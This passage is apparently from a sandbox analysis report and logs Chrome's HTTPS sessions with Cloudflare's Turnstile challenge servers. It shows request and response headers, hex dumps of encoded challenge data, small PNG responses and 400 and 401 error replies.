                                                                                        2025-03-20 17:46:40 UTC1190OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/310346162:1742491115:9Ic98fm1bm6UZNqolicYeekvkrwSVIH1ayYCexa4QzM/923707b7eceb8ce8/2CNAH9JqFOOP8uA0lIBT02cSnv2QlQTl.ABIWgr0E1A-1742492798-1.1.1.1-aR2nHo7nsO9RghcdPok9EtURfSVO2zwh0rs3oVvye6ThxHDBNOawXnDFAvvWnA2Z HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 3700
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                        cf-chl: 2CNAH9JqFOOP8uA0lIBT02cSnv2QlQTl.ABIWgr0E1A-1742492798-1.1.1.1-aR2nHo7nsO9RghcdPok9EtURfSVO2zwh0rs3oVvye6ThxHDBNOawXnDFAvvWnA2Z
                                                                                        cf-chl-ra: 0
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: */*
                                                                                        Origin: https://challenges.cloudflare.com
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6kzry/0x4AAAAAABBUE4SschSoV_Hq/auto/fbE/new/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:40 UTC3700OUTData Raw: 69 57 68 33 34 33 2b 33 58 33 68 33 64 4f 49 52 4f 49 4a 33 4f 4b 77 4d 4c 50 4f 54 49 4c 49 6b 44 4b 42 43 73 49 51 72 4d 33 4e 73 77 72 49 32 49 35 73 4c 4d 61 73 2d 2b 38 61 49 54 73 42 61 49 41 49 69 55 33 49 34 72 33 49 75 42 49 75 39 57 2d 6e 49 58 68 7a 72 72 61 42 73 77 66 49 67 4b 77 6b 49 58 79 78 51 6f 49 6e 2b 50 2d 6e 6d 6f 5a 75 49 6e 4f 6f 4b 2d 43 42 6e 33 77 38 49 76 63 72 6f 63 72 38 49 46 5a 72 31 47 47 57 67 5a 51 49 68 4b 6d 49 68 56 56 52 58 33 70 6b 4f 72 33 49 6e 55 44 78 63 45 73 48 79 2d 2d 78 4c 77 51 38 75 5a 51 78 75 5a 67 42 2d 33 49 57 2b 49 56 50 38 63 51 49 68 68 70 69 42 33 75 49 42 39 42 49 42 56 49 71 33 49 66 65 45 2d 42 69 49 49 6b 77 49 4f 66 49 41 4d 49 38 45 2d 6e 49 4c 4d 7a 49 2d 34 63 75 6f 68 61 49 42 55 75 49
                                                                                        Data Ascii: iWh343+3X3h3dOIROIJ3OKwMLPOTILIkDKBCsIQrM3NswrI2I5sLMas-+8aITsBaIAIiU3I4r3IuBIu9W-nIXhzrraBswfIgKwkIXyxQoIn+P-nmoZuInOoK-CBn3w8Ivcrocr8IFZr1GGWgZQIhKmIhVVRX3pkOr3InUDxcEsHy--xLwQ8uZQxuZgB-3IW+IVP8cQIhhpiB3uIB9BIBVIq3IfeE-BiIIkwIOfIAMI8E-nILMzI-4cuohaIBUuI
                                                                                        2025-03-20 17:46:41 UTC1091INHTTP/1.1 200 OK
                                                                                        Date: Thu, 20 Mar 2025 17:46:41 GMT
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Content-Length: 230972
                                                                                        Connection: close
                                                                                        cf-chl-gen: L/qgY+JgKMIbaGcXTTq80FPNzGDB6HZ81AScMcVt1QhmpSF8ar61GGECWqSJnMSVh375Qm835Ey4Muzcu8iIgxnTCsubnBJhpXAqEE9e5kF2TfixDhR6EkpkdrqiAk6EM9CB2rUANX6fwc99s4hiHdZzvN15dlqZ0X/V8LiJO5LnVScnBPok9JYdTTs6gNSdoH9x1KzY0ue+v86KDhRFxIOl+T0n4VwzOC74POs6nuWBEQgR0MGKlq0UW74xd4jQPhYIjhaztJVozLX6IkDMAx8UYZHG4Z+wt2rstVFlMdaNPlicQ1DkxCALTfx4cetux+YRENceJKCIafX+M3I3WmrvZue7ykIGbnm/a5fCzE89bhCMvIyaot8s+mtGrLYb2ZLe8NKzAHRCl4W8mWsYe6pJxbj8gozZXW7BFh8THXjJxpfE1Y0o0kmqfrqu3W5nVD4VAJQKkuq3WqMTh+Hol+bQfTwmhiZFa1afEAMW2Cd7+9WxR8i0E36zlkDsw+2LThjNO05zfvnacvCDeacq5lzvMyoOt9mQfzvH1dxVS8PiXKWZnhrKrOs3WAStnmPE8+06rZfA0Ejf01RQStbqDf8lAcR0Wh5udyZaDIfiN9Y9jMu5kcdp8HfxmKaCNA9UQDT4YJJjssUGWDQYOJ4qNQKLyIbNW4TiQ1FhkAyz61iNS/7VNMW76IIXYe8vVOx31QvvDbxx0FhtUCwv9zSk1KSCzbd+eRs4AG2/gLyCfDY6sEOGx5QK61dtNCoqGS9a+e6RrapBaTiHuYUeGihspMbj9QC2xl4FCwR1cBb0M4UGwakSzYjzHP6VnzYlwjPK$HIuSbhYtV6rGtwztiebx1Q==
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 923707c54948c484-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-20 17:46:41 UTC278INData Raw: 57 47 4a 4b 55 56 35 51 52 6f 32 51 61 59 56 33 63 4a 42 56 65 6e 46 70 67 4a 52 77 6f 33 79 66 67 35 69 6a 61 5a 32 46 67 59 43 47 72 36 2b 53 6e 4a 43 56 66 61 4f 59 6c 59 53 53 72 4b 61 7a 6b 4c 4f 33 6e 35 6d 34 66 5a 2b 62 75 4c 36 78 6f 34 57 33 71 36 57 4a 69 61 65 6c 31 4b 44 48 71 4e 65 77 30 71 2f 4c 6d 38 57 37 30 62 6d 68 31 4a 71 30 30 62 6a 6e 30 38 66 44 79 71 58 49 78 4f 36 72 36 73 44 6d 31 62 2f 6a 31 37 66 69 79 38 58 45 39 63 37 75 39 76 54 55 75 2b 58 51 38 2b 6a 52 35 64 72 55 78 4f 6e 65 32 66 6f 44 37 39 33 73 45 2b 6a 55 45 2b 33 53 46 77 63 58 44 41 38 43 38 64 34 57 41 75 41 43 45 78 34 44 34 68 34 4f 37 53 45 4a 4c 79 4d 45 2f 51 45 69 42 2b 34 7a 4c 77 77 74 42 68 77 5a 46 69 49 4f 4c 78 44 2b 4a 2f 34 6f 4f 69 41 44 54 45 6f
                                                                                        Data Ascii: WGJKUV5QRo2QaYV3cJBVenFpgJRwo3yfg5ijaZ2FgYCGr6+SnJCVfaOYlYSSrKazkLO3n5m4fZ+buL6xo4W3q6WJiael1KDHqNew0q/Lm8W70bmh1Jq00bjn08fDyqXIxO6r6sDm1b/j17fiy8XE9c7u9vTUu+XQ8+jR5drUxOne2foD793sE+jUE+3SFwcXDA8C8d4WAuACEx4D4h4O7SEJLyME/QEiB+4zLwwtBhwZFiIOLxD+J/4oOiADTEo
                                                                                        2025-03-20 17:46:41 UTC1369INData Raw: 31 4c 53 6c 46 41 59 43 35 50 5a 44 74 68 58 54 38 33 50 32 46 44 53 30 4e 6c 52 6d 56 48 61 55 68 50 5a 6b 70 59 64 6e 74 63 57 6b 38 36 56 46 4e 50 55 57 35 57 65 49 4e 79 59 58 78 68 64 6c 39 2f 68 34 56 6c 54 48 5a 6e 68 48 6c 31 6a 6d 70 33 61 59 70 76 6a 35 69 65 64 34 52 64 6d 46 32 4a 5a 59 69 46 69 32 61 49 67 6e 71 52 6d 34 57 30 6f 4a 53 51 74 4a 71 48 70 34 69 2b 6e 6e 65 72 6f 70 4f 77 70 61 47 37 6c 62 69 70 74 4a 7a 4d 79 4b 79 6f 7a 4c 4b 66 76 36 44 57 74 6f 2f 44 75 71 6a 49 76 61 33 63 73 65 48 42 30 37 48 68 30 72 58 6b 34 37 48 49 78 4f 47 6d 78 63 4c 77 79 66 44 45 35 4f 2f 71 79 4d 4c 57 32 4e 62 4c 74 74 58 4f 38 4d 30 42 31 4d 37 5a 2f 74 6b 49 41 63 58 6d 39 2f 6e 45 78 77 50 79 30 67 59 47 33 52 44 73 43 65 30 44 32 39 73 4b 30
                                                                                        Data Ascii: 1LSlFAYC5PZDthXT83P2FDS0NlRmVHaUhPZkpYdntcWk86VFNPUW5WeINyYXxhdl9/h4VlTHZnhHl1jmp3aYpvj5ied4RdmF2JZYiFi2aIgnqRm4W0oJSQtJqHp4i+nneropOwpaG7lbiptJzMyKyozLKfv6DWto/DuqjIva3cseHB07Hh0rXk47HIxOGmxcLwyfDE5O/qyMLW2NbLttXO8M0B1M7Z/tkIAcXm9/nExwPy0gYG3RDsCe0D29sK0
                                                                                        2025-03-20 17:46:41 UTC1369INData Raw: 6a 4a 47 49 39 4d 79 68 6d 51 54 59 73 61 6b 67 6f 4d 47 35 4d 4b 44 52 79 54 55 59 34 64 6c 46 4a 50 48 70 56 54 45 42 2b 57 56 64 45 67 6c 31 61 53 49 5a 68 58 45 79 4b 5a 57 5a 51 6a 6d 6c 70 59 57 6d 4f 65 49 4f 57 63 58 42 39 6b 33 79 61 6f 61 4b 53 63 6e 69 52 63 36 71 69 68 33 6d 75 70 6f 70 73 73 71 71 4f 6a 62 61 75 6b 6f 6d 36 73 70 61 55 65 4c 2b 4e 71 70 36 51 74 73 53 47 75 71 4b 53 6d 4a 79 38 74 34 75 34 79 4d 32 39 31 4d 62 50 74 4c 48 4e 6b 72 65 76 74 64 50 4b 73 36 71 35 31 61 4f 6a 30 5a 6a 6d 75 71 54 70 33 4d 72 49 72 75 54 74 33 73 54 51 37 38 33 55 30 65 32 79 31 39 54 59 75 50 6a 52 41 75 77 41 2b 38 43 2f 33 2b 48 33 36 74 6a 34 37 64 6b 48 34 2b 37 68 43 4f 49 46 38 51 44 6e 47 42 41 61 42 51 33 76 37 51 41 65 48 68 41 5a 48 66
                                                                                        Data Ascii: jJGI9MyhmQTYsakgoMG5MKDRyTUY4dlFJPHpVTEB+WVdEgl1aSIZhXEyKZWZQjmlpYWmOeIOWcXB9k3yaoaKScniRc6qih3mupopssqqOjbaukom6spaUeL+Nqp6QtsSGuqKSmJy8t4u4yM291MbPtLHNkrevtdPKs6q51aOj0ZjmuqTp3MrIruTt3sTQ783U0e2y19TYuPjRAuwA+8C/3+H36tj47dkH4+7hCOIF8QDnGBAaBQ3v7QAeHhAZHf
                                                                                        2025-03-20 17:46:41 UTC1369INData Raw: 4f 6a 6f 2f 4b 58 49 73 63 30 63 79 4d 33 42 70 52 30 52 63 65 54 5a 74 64 7a 77 37 59 46 32 44 5a 6c 52 30 61 57 57 49 5a 57 5a 34 58 57 46 4a 52 30 79 55 55 6c 4e 75 6b 57 5a 36 67 6d 78 57 66 48 31 58 66 6c 78 68 63 4a 64 79 5a 70 71 44 63 6e 74 38 59 35 65 6e 6d 47 61 65 67 72 43 75 6e 35 53 52 68 33 4b 51 6a 62 75 7a 76 59 2b 77 6f 62 57 53 74 4c 2b 75 73 4c 69 35 6e 37 57 6a 7a 6f 6a 4f 77 37 71 75 6f 4d 61 32 6c 73 71 69 73 63 32 70 7a 61 6e 64 73 4b 75 75 77 4c 2b 39 34 4b 48 43 76 64 57 6e 6f 39 37 63 72 75 47 36 36 2b 54 4c 39 4d 33 77 78 65 6e 47 77 73 72 74 78 65 62 6f 38 4f 33 55 37 64 73 46 35 4f 50 6e 77 74 33 66 31 74 55 4f 34 41 48 51 44 50 49 55 44 42 62 72 38 76 45 61 46 4e 6a 58 2f 50 6b 69 44 2f 77 68 49 41 62 67 4b 50 76 6d 35 78 54
                                                                                        Data Ascii: Ojo/KXIsc0cyM3BpR0RceTZtdzw7YF2DZlR0aWWIZWZ4XWFJR0yUUlNukWZ6gmxWfH1XflxhcJdyZpqDcnt8Y5enmGaegrCun5SRh3KQjbuzvY+wobWStL+usLi5n7WjzojOw7quoMa2lsqisc2pzandsKuuwL+94KHCvdWno97cruG66+TL9M3wxenGwsrtxebo8O3U7dsF5OPnwt3f1tUO4AHQDPIUDBbr8vEaFNjX/PkiD/whIAbgKPvm5xT
                                                                                        2025-03-20 17:46:41 UTC1369INData Raw: 7a 4d 77 63 57 52 45 61 6b 51 7a 4c 6b 70 64 57 6d 39 72 51 58 35 44 68 6b 34 2f 59 57 70 64 52 33 36 42 66 49 35 35 6b 6c 31 53 59 6f 69 57 68 32 78 73 65 56 70 71 6b 49 74 77 57 6e 53 42 70 4a 71 4e 5a 58 53 61 6e 70 36 44 6f 5a 79 41 72 36 75 45 6b 49 32 67 6c 6f 4a 33 64 36 6c 73 76 4c 32 71 6a 62 79 37 69 61 43 65 6d 71 61 53 68 34 65 35 66 4d 6d 37 72 71 4b 38 73 61 6d 45 70 4b 36 64 76 37 4f 79 6d 64 6e 48 71 4e 36 39 33 4b 44 43 74 74 44 45 70 62 72 45 32 75 50 6a 78 62 6a 4f 77 63 44 6f 76 4c 79 72 73 39 44 30 33 39 66 56 37 2b 58 33 36 74 66 39 32 77 44 67 33 41 48 6d 30 38 66 48 39 62 7a 43 33 73 67 4d 41 4d 72 67 30 66 41 48 42 41 44 55 45 2b 33 72 32 42 66 78 37 74 77 62 39 66 44 67 48 2f 6e 36 35 43 50 39 2f 66 58 39 49 77 30 59 4b 77 59 46
                                                                                        Data Ascii: zMwcWREakQzLkpdWm9rQX5Dhk4/YWpdR36BfI55kl1SYoiWh2xseVpqkItwWnSBpJqNZXSanp6DoZyAr6uEkI2gloJ3d6lsvL2qjby7iaCemqaSh4e5fMm7rqK8samEpK6dv7OymdnHqN693KDCttDEpbrE2uPjxbjOwcDovLyrs9D039fV7+X36tf92wDg3AHm08fH9bzC3sgMAMrg0fAHBADUE+3r2Bfx7twb9fDgH/n65CP9/fX9Iw0YKwYF
                                                                                        2025-03-20 17:46:41 UTC1369INData Raw: 74 6f 58 55 6c 75 54 6e 42 37 63 46 51 37 56 57 35 56 69 47 6c 32 53 30 75 46 51 4a 42 4a 66 48 39 4c 55 35 46 32 68 47 53 4b 63 5a 65 59 61 6e 31 36 65 32 6c 68 6c 70 61 55 5a 70 71 46 6c 49 47 46 68 34 36 42 6c 36 32 65 68 70 43 76 6a 5a 53 52 63 6e 4b 54 69 36 74 34 74 34 2b 4b 72 49 79 52 73 37 2b 36 6c 72 75 71 6d 37 69 72 79 4d 4f 69 30 5a 32 36 6f 71 33 4c 31 61 75 6d 71 63 69 73 70 72 48 51 73 37 36 78 34 4c 4f 75 7a 38 36 33 31 2b 43 6d 79 75 76 6e 32 73 50 4b 34 4f 62 63 35 4e 50 48 31 36 36 79 35 74 6a 75 39 4c 37 79 79 74 48 75 31 51 58 4e 2b 39 58 35 31 4d 51 4c 7a 4f 44 61 44 4e 77 4c 38 38 6f 46 45 67 49 5a 35 4e 44 34 39 65 76 57 2b 50 6e 58 36 76 44 32 33 76 54 67 4b 66 55 54 42 2f 67 66 4b 65 34 69 43 77 49 66 42 6a 58 39 4c 42 41 6f 4d
                                                                                        Data Ascii: toXUluTnB7cFQ7VW5ViGl2S0uFQJBJfH9LU5F2hGSKcZeYan16e2lhlpaUZpqFlIGFh46Bl62ehpCvjZSRcnKTi6t4t4+KrIyRs7+6lruqm7iryMOi0Z26oq3L1aumqcisprHQs76x4LOuz8631+Cmyuvn2sPK4Obc5NPH166y5tju9L7yytHu1QXN+9X51MQLzODaDNwL88oFEgIZ5ND49evW+PnX6vD23vTgKfUTB/gfKe4iCwIfBjX9LBAoM
                                                                                        2025-03-20 17:46:41 UTC1369INData Raw: 4b 56 31 78 4f 65 32 56 53 51 56 5a 7a 65 32 42 44 62 47 46 47 68 6d 56 74 67 33 5a 6d 68 48 6c 32 61 58 53 4d 6a 48 56 36 6c 47 46 64 66 5a 2b 61 67 46 2b 61 6c 33 75 65 5a 35 68 70 72 48 75 45 71 59 65 42 6c 6f 61 6b 6d 5a 57 72 69 61 79 5a 71 4a 48 41 72 6e 7a 43 76 61 43 63 68 73 53 37 79 4b 69 2b 76 73 4b 6f 72 38 43 6b 30 38 2b 72 6f 71 6a 48 77 36 33 54 6d 37 53 38 75 62 6e 63 33 72 66 45 33 4e 69 64 75 61 6a 4b 77 4b 58 70 32 61 61 38 71 4b 7a 79 37 73 44 54 78 4f 72 36 37 74 54 6b 79 4d 75 33 2b 74 77 42 36 39 50 56 2b 2f 48 49 39 74 6b 4a 79 67 7a 73 36 65 62 79 33 51 44 67 44 2b 6a 4f 30 52 44 70 35 52 6b 55 37 65 6b 56 37 67 4c 38 33 51 44 6c 4b 50 7a 70 44 42 66 72 48 51 33 6e 2b 52 4d 48 49 52 59 53 4a 52 45 70 47 6a 41 53 4d 66 6b 37 46 43
                                                                                        Data Ascii: KV1xOe2VSQVZze2BDbGFGhmVtg3ZmhHl2aXSMjHV6lGFdfZ+agF+al3ueZ5hprHuEqYeBloakmZWriayZqJHArnzCvaCchsS7yKi+vsKor8Ck08+roqjHw63Tm7S8ubnc3rfE3NiduajKwKXp2aa8qKzy7sDTxOr67tTkyMu3+twB69PV+/HI9tkJygzs6eby3QDgD+jO0RDp5RkU7ekV7gL83QDlKPzpDBfrHQ3n+RMHIRYSJREpGjASMfk7FC
                                                                                        2025-03-20 17:46:41 UTC1369INData Raw: 67 6c 31 5a 53 45 5a 4b 6a 48 64 66 5a 4a 42 37 63 32 6d 50 53 59 4b 45 62 47 69 50 62 4a 4a 34 62 59 4a 2f 58 35 5a 2b 68 49 52 2b 69 57 65 49 6e 6d 6c 75 6f 48 70 35 70 49 53 4f 72 35 36 49 6b 72 4e 34 6a 49 61 46 74 6f 2b 76 74 37 57 56 66 4b 61 5a 74 4b 69 41 74 4a 6d 38 78 34 75 66 7a 38 66 43 6f 63 53 78 7a 36 2b 7a 75 71 69 70 6c 4c 36 32 7a 4d 47 78 6e 37 54 55 34 35 6a 51 32 38 71 38 32 4d 79 39 32 4c 33 67 37 4c 76 45 76 75 76 70 78 66 6a 5a 37 63 72 49 78 65 2f 51 37 2f 66 31 31 62 7a 52 37 74 66 53 42 65 6a 6d 32 38 62 72 34 52 48 71 34 2b 2f 67 37 75 50 33 39 51 58 71 38 42 34 66 37 69 45 61 34 52 6b 50 41 41 44 38 4a 75 59 57 41 76 51 41 39 69 59 61 4c 76 6f 70 48 69 55 68 4f 4f 2f 33 4b 41 4d 70 43 7a 6f 71 51 51 30 38 2f 45 51 59 42 42 63
                                                                                        Data Ascii: gl1ZSEZKjHdfZJB7c2mPSYKEbGiPbJJ4bYJ/X5Z+hIR+iWeInmluoHp5pISOr56IkrN4jIaFto+vt7WVfKaZtKiAtJm8x4ufz8fCocSxz6+zuqiplL62zMGxn7TU45jQ28q82My92L3g7LvEvuvpxfjZ7crIxe/Q7/f11bzR7tfSBejm28br4RHq4+/g7uP39QXq8B4f7iEa4RkPAAD8JuYWAvQA9iYaLvopHiUhOO/3KAMpCzoqQQ08/EQYBBc
                                                                                        2025-03-20 17:46:41 UTC1369INData Raw: 47 43 41 62 6f 4a 6a 6b 34 75 42 61 56 4b 4d 6c 6f 56 36 65 70 71 4a 65 6d 42 63 64 35 68 74 59 33 69 59 70 31 79 55 6f 58 6c 70 66 34 71 4a 73 59 47 7a 71 37 57 6a 6c 34 57 33 6b 48 52 38 76 4a 43 4b 6c 62 61 52 66 49 54 44 6d 62 6d 56 78 35 76 4c 78 49 6d 65 71 71 6e 46 70 59 32 6c 31 4b 6a 4a 79 38 4c 48 75 36 62 62 73 75 48 4d 6e 62 50 54 6f 4f 57 32 73 73 6e 64 79 39 7a 6e 34 4d 4b 71 35 50 48 63 72 62 54 7a 7a 4c 4c 6f 36 73 37 46 38 2b 33 52 79 75 48 37 34 2f 51 41 42 74 62 34 35 51 6e 61 35 75 55 4f 33 77 59 45 45 65 58 64 44 42 48 30 44 51 55 61 42 75 72 36 47 77 6e 75 47 53 45 4f 41 2b 48 67 39 53 67 67 46 51 30 69 48 52 38 41 49 51 72 75 46 43 55 77 4e 67 63 70 46 6a 6b 4c 46 78 59 2b 45 44 59 30 51 52 59 4f 50 45 45 6c 50 54 56 4b 4e 68 73 72
                                                                                        Data Ascii: GCAboJjk4uBaVKMloV6epqJemBcd5htY3iYp1yUoXlpf4qJsYGzq7Wjl4W3kHR8vJCKlbaRfITDmbmVx5vLxImeqqnFpY2l1KjJy8LHu6bbsuHMnbPToOW2ssndy9zn4MKq5PHcrbTzzLLo6s7F8+3RyuH74/QABtb45Qna5uUO3wYEEeXdDBH0DQUaBur6GwnuGSEOA+Hg9SggFQ0iHR8AIQruFCUwNgcpFjkLFxY+EDY0QRYOPEElPTVKNhsr


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        18192.168.2.1649734104.18.94.414436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:41 UTC638OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/310346162:1742491115:9Ic98fm1bm6UZNqolicYeekvkrwSVIH1ayYCexa4QzM/923707b7eceb8ce8/2CNAH9JqFOOP8uA0lIBT02cSnv2QlQTl.ABIWgr0E1A-1742492798-1.1.1.1-aR2nHo7nsO9RghcdPok9EtURfSVO2zwh0rs3oVvye6ThxHDBNOawXnDFAvvWnA2Z HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:41 UTC442INHTTP/1.1 400 Bad Request
                                                                                        Date: Thu, 20 Mar 2025 17:46:41 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 14
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        cf-chl-out: +8H2l+/ryIZibMo+njnV8Y/KXPoip/hIHuh/zCLABlOq1zerPkKqf8pK+w06X/gF43ZzWkIit3VfxCVkNc9XeA==$+iDMduVtfvagIp6VkoO+og==
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 923707cbca9a4286-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-20 17:46:41 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 38 30 7d
                                                                                        Data Ascii: {"err":100280}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        19192.168.2.1649735104.18.95.414436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:41 UTC827OUTGET /cdn-cgi/challenge-platform/h/b/d/923707b7eceb8ce8/1742492800972/GKCgZTjmCvgxbop HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6kzry/0x4AAAAAABBUE4SschSoV_Hq/auto/fbE/new/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:42 UTC200INHTTP/1.1 200 OK
                                                                                        Date: Thu, 20 Mar 2025 17:46:42 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 61
                                                                                        Connection: close
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 923707cd7967c351-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-20 17:46:42 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1c 00 00 00 57 08 02 00 00 00 98 f0 b2 6c 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                        Data Ascii: PNGIHDRWlIDAT$IENDB`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        20192.168.2.1649736104.18.94.414436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:42 UTC468OUTGET /cdn-cgi/challenge-platform/h/b/d/923707b7eceb8ce8/1742492800972/GKCgZTjmCvgxbop HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:42 UTC200INHTTP/1.1 200 OK
                                                                                        Date: Thu, 20 Mar 2025 17:46:42 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 61
                                                                                        Connection: close
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 923707d099dc4308-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-20 17:46:42 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1c 00 00 00 57 08 02 00 00 00 98 f0 b2 6c 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                        Data Ascii: PNGIHDRWlIDAT$IENDB`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        21192.168.2.1649737104.18.95.414436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:42 UTC856OUTGET /cdn-cgi/challenge-platform/h/b/pat/923707b7eceb8ce8/1742492800976/bde426b7923722d2c6f2630eebdab868e4e355ae0b52186206f78e4da8c7c454/OrJeW4tuWUw2AZ2 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: max-age=0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6kzry/0x4AAAAAABBUE4SschSoV_Hq/auto/fbE/new/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:43 UTC143INHTTP/1.1 401 Unauthorized
                                                                                        Date: Thu, 20 Mar 2025 17:46:43 GMT
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Content-Length: 1
                                                                                        Connection: close
